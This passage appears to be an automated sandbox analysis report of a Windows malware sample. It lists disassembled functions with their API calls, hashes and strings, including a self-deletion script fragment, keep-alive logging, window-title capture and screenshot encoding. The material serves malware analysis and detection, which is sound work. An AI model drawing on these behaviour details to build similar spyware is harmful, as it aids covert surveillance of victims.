                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$ForegroundLength
                              • String ID: [ $ ]
                              • API String ID: 3309952895-93608704
                              • Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                              • Opcode Fuzzy Hash: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                              Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandlePointerWrite
                              • String ID:
                              • API String ID: 3604237281-0
                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                              Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                              Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                              Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                              • String ID:
                              • API String ID: 737400349-0
                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                              Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad$ErrorLast
                              • String ID:
                              • API String ID: 3177248105-0
                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                              Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                              • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                              Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: MetricsSystem
                              • String ID:
                              • API String ID: 4116985748-0
                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                              Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CountEventTick
                              • String ID: >G
                              • API String ID: 180926312-1296849874
                              • Opcode ID: 526d7ca2505a7983556bdafa8031fb7c86d7427c55477993c06890729ecb053e
                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                              • Opcode Fuzzy Hash: 526d7ca2505a7983556bdafa8031fb7c86d7427c55477993c06890729ecb053e
                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                              Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Info
                              • String ID: $fD
                              • API String ID: 1807457897-3092946448
                              • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                              • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                              Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                              • String ID: image/jpeg
                              • API String ID: 1291196975-3785015651
                              • Opcode ID: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                              • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                              • Opcode Fuzzy Hash: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                              • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                              Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ACP$OCP
                              • API String ID: 0-711371036
                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                              Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                              • String ID: image/png
                              • API String ID: 1291196975-2966254431
                              • Opcode ID: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                              • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                              • Opcode Fuzzy Hash: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                              • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                              Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 481472006-1507639952
                              • Opcode ID: 17f6677c4349498a975024044c14d9a5c316ee35d9cd9886d2c8e963fff4f96f
                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                              • Opcode Fuzzy Hash: 17f6677c4349498a975024044c14d9a5c316ee35d9cd9886d2c8e963fff4f96f
                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                              Function 004336EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: LG$XG
                              • API String ID: 0-1482930923
                              • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                              • Instruction ID: b803d8f2fb0d60b71c32d24796bf113498d2ea24005d64aa96dbf80bf0db992b
                              • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                              • Instruction Fuzzy Hash: CE11A3B1D01654AACB20EFA998017CFB7A55F09725F14D06BED18EF281D3B9DB408B98
                              Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: | $%02i:%02i:%02i:%03i
                              • API String ID: 481472006-2430845779
                              • Opcode ID: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                              • Opcode Fuzzy Hash: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                              Function 004125EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: QueryValue
                              • String ID: TUF
                              • API String ID: 3660427363-3431404234
                              • Opcode ID: 3b78be7274fe7523ce167e025b78789c7b39fba0dda90363f1a256c0226bf42c
                              • Instruction ID: 62a4949b47554db758ef5e9b715c6ec4cc130d120bf99ac1ec1555789b8052d8
